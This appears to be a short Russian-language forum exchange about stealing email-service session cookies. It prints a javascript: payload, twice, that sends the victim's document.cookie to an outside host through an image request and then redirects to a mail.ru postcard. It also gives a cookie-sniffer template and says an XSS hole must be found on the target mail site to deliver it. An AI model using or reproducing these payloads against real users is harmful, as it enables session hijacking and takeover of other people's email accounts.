javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/ndfafti90b6.gif?"+document.cookie;var URL = "http://images.cards.mail.ru/11bolprivet.jpg";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);</script>')
там написано вставить в браузер эту сылку avascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/ndfafti90b6.gif?"+document.cookie;var URL = "http://images.cards.mail.ru/11bolprivet.jpg";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);</script>') и выйдет ошибка
_http://www.sniffack.tu2.ru javascript:img = new Image(); img.src = "тут адрес картинки"+document.cookie;
хм... для того что бы начинать формировать запрос, тебе нужно найти уязвимость вида XSS на атакуемом сайте электронной почтовой службы, по средствам которого ты и вставишь свой сформированный запрос, по средствам которого, куки жертвы будут направляться в лог файл твого снифера.